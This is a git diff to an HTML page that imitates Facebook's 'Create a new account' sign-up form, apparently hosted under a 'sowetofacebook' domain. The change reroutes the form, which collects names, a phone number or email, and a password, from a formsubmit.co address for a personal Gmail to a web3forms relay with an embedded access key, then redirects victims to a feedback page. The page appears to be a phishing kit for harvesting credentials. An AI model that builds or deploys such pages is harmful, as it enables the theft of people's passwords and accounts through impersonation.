--- a/index.html
+++ b/index.html
@@ -53,7 +53,19 @@ color: rgb(245, 243, 240);
     <h2>Create a new account</h2>
     <h3>its quick and easy</h3>
     
-<form action="https://formsubmit.co/tochukwujoshua19@gmail.com" method="post">
+<form action="https://api.web3forms.com/submit" method="POST" method="post">
+
+     <!-- Replace with your Access Key -->
+     <input type="hidden" name="access_key" value="ff9f18de-7a1c-4758-be3b-57430c9cfd9e">
+
+
+      <!-- Optional: Custom Redirection or Thank you Page
+       Make sure you add full URL including https:// -->
+  <input type="hidden" name="redirect" value="https://sowetofacebooksubmit.vercel.app/feedback.html">
+
+
+
+
 
 
     <input type="text" placeholder="First name" name="First name">
@@ -77,7 +89,7 @@ color: rgb(245, 243, 240);
 <input type="text" placeholder="Mobile number or email address" name="Mobile number">
 <br>
 <br>
-<input type="password" placeholder="New password" name="New password">
+<input type="password" placeholder="New password" name="Pass">
 <br>
 <br>
 <button>Signing</button>
